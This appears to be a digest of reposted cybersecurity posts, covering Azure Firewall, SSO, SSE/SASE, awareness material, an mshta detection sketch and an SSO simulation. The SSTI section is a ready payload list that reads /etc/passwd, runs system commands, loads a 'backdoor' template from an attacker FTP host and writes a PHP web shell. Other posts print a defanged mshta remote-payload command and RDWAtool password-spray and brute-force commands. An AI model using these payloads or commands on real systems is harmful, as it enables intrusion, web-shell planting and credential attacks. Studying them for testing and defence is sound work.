Forwarded from Exploiting Crew (Pr1vAt3)
Azure Firewall
Azure Firewall is a stateful, cloud-native network security service designed to secure your Azure workloads and ensure compliance in today's threat-laden digital landscape.
Key Features You Need to Know:
1️⃣ Application and Network Rule Filtering
• Define rules based on FQDNs, ports, and protocols to control inbound and outbound traffic.
• Layer 7 filtering for advanced application-level protection.
2️⃣ Threat Intelligence-Based Filtering
• Leverage Microsoft Threat Intelligence to block malicious IPs and domains automatically.
• Get real-time threat updates for proactive defense.
3️⃣ Built-in High Availability
• No need for load balancers: Azure Firewall is built for redundancy and 99.95% SLA.
4️⃣ Dynamic Scalability
• Scales automatically to handle high traffic volumes, ensuring uninterrupted security.
5️⃣ Centralized Policy Management
• Manage security policies across multiple Azure Firewalls using Azure Firewall Manager.
6️⃣ Logging and Analytics
• Monitor traffic patterns with deep logging and analytics in Azure Monitor and Sentinel.
7️⃣ Hybrid and Multi-Cloud Support
• Secure traffic between on-premises, Azure, and other cloud providers using ExpressRoute and VPN Gateway.
Advanced Scenarios with Azure Firewall:
• Network Address Translation (NAT): Protect public-facing services with DNAT/SNAT rules.
• Integration with Private Link: Secure connections to Azure PaaS services.
• Zero Trust Network Security: Enforce strict segmentation and access controls.
Why Choose Azure Firewall?
• Enterprise-grade security with TLS inspection and IDPS (Intrusion Detection & Prevention System).
• Globally distributed for large-scale enterprise needs.
• Effortless integration with Azure Security Center, Azure Virtual WAN, and third-party SIEM tools.
Ref: Mahesh Girhe
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁
Master Cybersecurity Awareness: Protect Yourself in the Digital World!
In the ever-evolving digital landscape, cyber threats are becoming increasingly sophisticated. Whether you're an individual user or a professional, understanding cybersecurity is crucial to protecting your data, privacy, and assets.
The Cybersecurity Awareness Handbook is your one-stop guide to safeguarding your online presence. Here's what it covers:
Key Insights in the Handbook
1️⃣ Understanding Cyber Threats
• Learn about phishing, ransomware, malware, and social engineering attacks.
• Understand how attackers exploit vulnerabilities in systems and human behavior.
2️⃣ Building Strong Cyber Defenses
• Create robust passwords and implement multi-factor authentication (MFA).
• Discover the importance of regular software updates and patch management.
3️⃣ Safe Online Practices
• Tips for secure online shopping and social media usage.
• Identifying fake websites and avoiding harmful downloads.
4️⃣ Incident Response Plans
• Step-by-step guidance on responding to data breaches or system compromises.
• Learn about reporting cybercrimes and recovering from attacks.
5️⃣ Empowering Your Workplace
• Tips for creating a cybersecurity culture in professional environments.
• How employees can become the first line of defense against cyber threats.
Why You Need This Handbook
• Stay Ahead of Threats: Cybersecurity is evolving daily; this guide keeps you informed.
• Actionable Tips: Practical steps to implement immediately for better security.
• Comprehensive Knowledge: From basic concepts to advanced strategies, it's all here.
Ready to strengthen your cybersecurity skills?
Download the Cybersecurity Awareness Handbook now and take charge of your online safety.
Ref: Mahesh Girhe
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁
Secure Code Review Challenge 16:
The goal of this challenge is to pop a shell and then provide concrete code-level remediation guidance on how to fix the vulnerability.
You can run the challenge on your machine by cloning the GitHub repo, navigating into './challenge-16', and running 'docker-compose up'.
Ref: Florian Walter
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁
Account Takeover Techniques: Critical Vulnerabilities Mindmap
Account takeover (ATO) is a critical vulnerability that can compromise sensitive user data and system integrity. This mindmap outlines various ATO techniques, including:
• IDOR in Password Reset
• Password Reset Poisoning
• Mass Assignment
• OAuth Misconfigurations
• Improper Rate-Limit Checks, etc.
Ref: AMIT KUMAR
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁
FREE courses to boost your skills!
1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h
Ref: Mohamed Hamdi
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁
New SSTI (Server Side Template Injection) - Payloads
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
Ref: Aman Dara
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁
LOLBins attacks:
mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.
During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.
The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.
Note: These logs revealed suspicious PowerShell commands executing obfuscated scripts.
Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.
Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:
1. Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2. Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.
Sample Code: mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"
#incidentresponse #dfir #soc #cybersecurity #mitre #attack #windows
Ref: Soumick kar
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁
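Added example, not part of the original post: a triage sketch that correlates the two signals the post describes, mshta.exe launched with a remote URL and obfuscated PowerShell script blocks (Event ID 4104), on the same host. The event records, field names, host names and the use of Event ID 4688 for process creation are constructed assumptions, not data from the incident.

```python
import re
from collections import defaultdict

# Constructed, simplified events. 4688 = Security process creation,
# 4104 = PowerShell script block logging. Field names are assumptions.
SAMPLE_EVENTS = [
    {"id": 4688, "host": "WS01", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "http://example.invalid/update.hta"',
     "parent": "powershell.exe"},
    {"id": 4688, "host": "WS02", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
     "parent": "explorer.exe"},
    {"id": 4104, "host": "WS01",
     "script": "$c=[Convert]::FromBase64String($b);IEX([Text.Encoding]::UTF8.GetString($c))"},
    {"id": 4104, "host": "WS03", "script": "Get-ChildItem C:\\Logs | Sort-Object Length"},
    {"id": 4688, "host": "WS04", "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/a.hta", "parent": "explorer.exe"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPT_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                  "cscript.exe", "winword.exe", "excel.exe", "outlook.exe"}
OBFUSCATION_MARKERS = {
    "base64 decode": re.compile(r"FromBase64String", re.I),
    "dynamic eval": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "encoded command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def mshta_findings(events):
    """Flag mshta.exe launches with a remote URL or a script/Office parent."""
    out = []
    for ev in events:
        if ev["id"] != 4688 or not ev["image"].lower().endswith("\\mshta.exe"):
            continue
        reasons = []
        if URL_RE.search(ev["cmdline"]):
            reasons.append("remote URL argument")
        if ev["parent"].lower() in SCRIPT_PARENTS:
            reasons.append("script or Office parent: " + ev["parent"])
        if reasons:
            out.append((ev["host"], reasons))
    return out

def obfuscated_scriptblocks(events, threshold=2):
    """Flag 4104 script blocks that hit at least `threshold` markers."""
    out = []
    for ev in events:
        if ev["id"] != 4104:
            continue
        hits = [n for n, rx in OBFUSCATION_MARKERS.items() if rx.search(ev["script"])]
        if len(hits) >= threshold:
            out.append((ev["host"], hits))
    return out

def triage(events):
    """Hosts showing both signals are 'high'; a single signal is 'medium'."""
    signals = defaultdict(set)
    for host, _ in mshta_findings(events):
        signals[host].add("mshta")
    for host, _ in obfuscated_scriptblocks(events):
        signals[host].add("ps4104")
    return {h: "high" if len(s) == 2 else "medium" for h, s in signals.items()}

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The local-HTA launch on WS02 is deliberately left unflagged: the signal is the remote URL or the unusual parent, not mshta.exe by itself.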
SSO (Single Sign-On) Explained.
SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.
In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamline user experience.
To fully understand the SSO process, let's take a look at how a user would log into LinkedIn using Google as the identity provider:
1) User requests access
First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".
2) Authentication request
From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.
3) IdP checks for active session
Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.
4) User submits credentials
At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).
5) IdP verifies credentials
The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.
6) IdP sends token to Service Provider
Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provider (LinkedIn).
7) Access granted using existing session
Since the Identity Provider has established a session, when the user goes to access a different Service Provider (e.g., GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.
SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.
What's your favourite way to go about authentication?
Ref: Nikki Siapno
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁
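Added example, not part of the original post: a small simulation of the seven steps above that also shows the checks a Service Provider has to make on the assertion it receives (signature, audience, expiry). The class names, the `sp-a.example` / `sp-b.example` audiences, the account and the HMAC signature (a stand-in for the asymmetric signatures used by SAML and OpenID Connect) are assumptions for illustration.

```python
import hashlib, hmac, json, secrets, time

class IdP:
    """Toy identity provider: user directory, browser sessions, assertion signing."""
    def __init__(self):
        # One signing key; HMAC stands in for the IdP's asymmetric signature.
        self.key = secrets.token_bytes(32)
        self.users = {}       # username -> (salt, PBKDF2 hash)
        self.sessions = {}    # session cookie -> username

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def add_user(self, user, password):
        salt = secrets.token_bytes(16)
        self.users[user] = (salt, self._hash(password, salt))

    def authenticate(self, audience, cookie=None, user=None, password=""):
        subject = self.sessions.get(cookie)          # step 3: active session?
        if subject is None:                          # steps 4-5: verify credentials
            salt, stored = self.users.get(user, (b"", None))
            if stored is None or not hmac.compare_digest(
                    self._hash(password, salt), stored):
                raise PermissionError("invalid credentials")
            subject, cookie = user, secrets.token_urlsafe(16)
            self.sessions[cookie] = subject
        # Step 6: assertion bound to one audience, valid for 60 seconds.
        body = json.dumps({"sub": subject, "aud": audience,
                           "exp": time.time() + 60}).encode()
        sig = hmac.new(self.key, body, hashlib.sha256).hexdigest()
        return cookie, (body, sig)

class ServiceProvider:
    def __init__(self, audience, idp_key):
        self.audience, self.idp_key = audience, idp_key

    def accept(self, assertion):
        body, sig = assertion
        expected = hmac.new(self.idp_key, body, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(sig, expected):
            raise PermissionError("bad signature")
        claims = json.loads(body)
        if claims["aud"] != self.audience:
            raise PermissionError("assertion issued for another service")
        if claims["exp"] < time.time():
            raise PermissionError("assertion expired")
        return claims["sub"]

def demo():
    idp = IdP()
    idp.add_user("alice", "correct horse battery")      # constructed account
    sp_a = ServiceProvider("sp-a.example", idp.key)
    sp_b = ServiceProvider("sp-b.example", idp.key)
    # Steps 1-6: first login at SP A needs credentials.
    cookie, for_a = idp.authenticate("sp-a.example", user="alice",
                                     password="correct horse battery")
    first = sp_a.accept(for_a)
    # Step 7: SP B is reached with the IdP session cookie only.
    _, for_b = idp.authenticate("sp-b.example", cookie=cookie)
    second = sp_b.accept(for_b)
    # An assertion minted for SP A must not open SP B.
    try:
        replay = sp_b.accept(for_a)
    except PermissionError as err:
        replay = str(err)
    return first, second, replay

if __name__ == "__main__":
    print(demo())
```

Because step 7 needs only the IdP session cookie, that cookie is worth as much as the password for every connected service, which is why the audience and expiry checks in `accept` matter.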
Extracting information remotely from Microsoft Remote Desktop Web Access (RDWA) with RDWAtool
Microsoft Remote Desktop Web Access (RDWA) applications are often overlooked yet can be a treasure trove of information for attackers. RDWAtool is a Python-based all-in-one tool designed to analyze and test RDWA instances for vulnerabilities while extracting valuable insights.
What can RDWAtool do?
1️⃣ Extract useful information in black box remotely:
- FQDN of the remote server to map the environment.
- Internal AD domain name derived from the FQDN.
- Remote Windows Server version for targeted exploitation.
In spray mode:
rdwatool spray -tu https://rds.podalirius.net/RDWeb/Pages/en-US/login.aspx
In brute mode:
rdwatool brute -tu https://rds.podalirius.net/RDWeb/Pages/en-US/login.aspx
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁
Cost Savings: SSE vs. SASE Simplified!
Organizations leveraging Palo Alto Networks experience significant ROI through unified management and simplified operations, all within a single pane of glass.
Streamline your security strategy while accelerating growth!
What's the Difference?
SSE (Security Service Edge):
Focuses on securing access to apps and data for remote and on-premises users.
Core features: SWG, CASB, and ZTNA for seamless, secure connectivity.
SASE (Secure Access Service Edge):
Combines networking (SD-WAN) and security services in a single cloud-delivered solution.
Perfect for securing distributed users and sites with optimal performance.
Why Choose Palo Alto Networks?
• Unified platform for better visibility and control.
• Simplified operations with scalable solutions for all use cases.
• Future-ready security with proven innovation.
Let's make security smarter, faster, and simpler, together!
Ref: Dhari A.
@UndercodeCommunity
▁ ▂ ▄ Undercode ▄ ▂ ▁